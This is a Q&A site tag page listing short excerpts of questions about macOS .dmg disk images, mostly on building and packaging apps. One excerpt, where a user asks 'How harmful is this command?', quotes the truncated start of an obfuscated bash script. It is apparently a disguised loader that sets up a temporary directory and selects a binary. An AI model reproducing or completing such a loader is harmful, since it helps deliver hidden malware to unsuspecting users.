Questions tagged [dmg]

apple Disk iMaGe – a popular format for distributing OS X applications.

272 questions
0
votes
1 answer

Compiling and running code as dmg or exe

Newbie question I am finding it hard to get my head around. If I wanted to use one of the many tool out their like rsync lsync or s3cmd how can you build these into a program for none computer savvy people to use. Ie I am comfortable opening…
DCHP
  • 1,111
  • 6
  • 29
  • 53
0
votes
1 answer

Getting BUILD FAILED error while building a dmg file

I am building dmg file by using ant tool, but I am getting error while build. Extract of build.xml: ...
developer
  • 9,116
  • 29
  • 91
  • 150
-1
votes
1 answer

How can I validate a DMG file?

I have an application that builds into a DMG file (via jpackage). As soon as users download the DMG they tell me it is corrupt and should be deleted. Now I am unfamiliar with that format and I have no access to any Apple Mac to try myself. Just in…
Queeg
  • 7,748
  • 1
  • 16
  • 42
-1
votes
1 answer

How do I change the formatting of the license agreement in a dmg file using CPack?

I am using CPack to create a dmg file for installation on MacOS. Because I have provided CPACK_RESOURCE_FILE_LICENSE the license file is included in the dmg file and a window is opened when trying to mount it. After clicking "Agree", I can drag and…
chiasmos
  • 110
  • 7
-1
votes
1 answer

What do I need to do/know to create an install button for an Electron application via a website?

I've been working with Electron for a few days now and before I decide if it's right for me, I want to know how to go about the installation/distribution process. Basically, I'm creating an application and I want it to be a desktop application so…
-1
votes
1 answer

How to build c++ code into a .dmg file rather than a .exe file on visual studio 2019 from a windows computer?

How would I build my c++ code into a dmg file other than a exe file which is what it always builds into. I am trying to make my programs useable by mac users but I cant find answers for this
user14530934
-1
votes
1 answer

How harmful is this command?

#!/bin/bash A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s"; export appDir=$(cd "$(dirname "$0")"; pwd -P) export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)" export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 |…
-1
votes
1 answer

How to bruteforce my own encrypted .dmg with known base password

I was fooling around with Disk Utility's encrypted .dmg feature. I accidentally put an important file in there and partly forgot the password. (I KNOW!) I know exactly what the first part of the password was, but the last 2-4 digits I have just a…
user11136475
-1
votes
1 answer

How create dynamic (growable) DMG file using terminal in MacOS

I want to create dynamic (growable) dmg file. I know sparse bundle works well with dynamic file but i want to create blank dynamic dmg file. I tried the following but did not work. Can anyone help please!:
Shalabh
  • 27
  • 4
-1
votes
1 answer

Deleting App from MacOS but not cleared NSUserDefaults data

I have one.dmg file, installed it one time and some data saved in NSUserDefaults. But When I am remove from application as well Trash its not cleared of that NSUserDefaults. I want to remove all of that.
iOSDeV
  • 77
  • 10
-1
votes
1 answer

How to Install Xamarian on My Android Glad X10.1

I am a newbee to c#. Please treat me as a beginner. I downloaded and installed Ximarian C# and the IDEA on my Windows 10 computer. Now, I want to install it onto my LGA ANDROID Gpad X10.1 so I can study and learn C# when I am not at home; I want…
-2
votes
1 answer

Python to Shareable Mac application

I have created a python tkinter data entry tool. I run PyInstaller on my mac and succesfully get a .app file that runs perfectly fine on my mac. When I put it in a box folder for my friend to use on his mac, he gets "You can't open the application…
-2
votes
1 answer

QT creator generate EXE file for windows or .dmg for mac osx

I have a question how to generate executables for Windows or .dmg for Mac OSX in Qt Creator. Please use easy way. I´m a beginner with QT creator. How to build mac osx app without Mac and how to build linux app without linux. I have a Windows 7…
Samuel Tulach
  • 1,319
  • 13
  • 38
-2
votes
1 answer

I just downloaded Java SE 8 off of the oracle website but I cannot find the actual application

The dmg file downloaded fine from Oracle and then I opened it and it installed the JDK although it seemed to have skipped the area to choose my document installing location. Now I cannot find where the actual program is. I have tried downloading it…
-3
votes
1 answer

How do I turn a python script that is using pygame into a DMG file?

So I have coded an app that I think would be really useful for Mac user but I have one problem! I can't export it as a DMG file using py2app since it uses pygame. I don't know if there's any other way to export it or any workaround. Please let me…
Tyguy47
  • 1
  • 1
1 2 3
18
19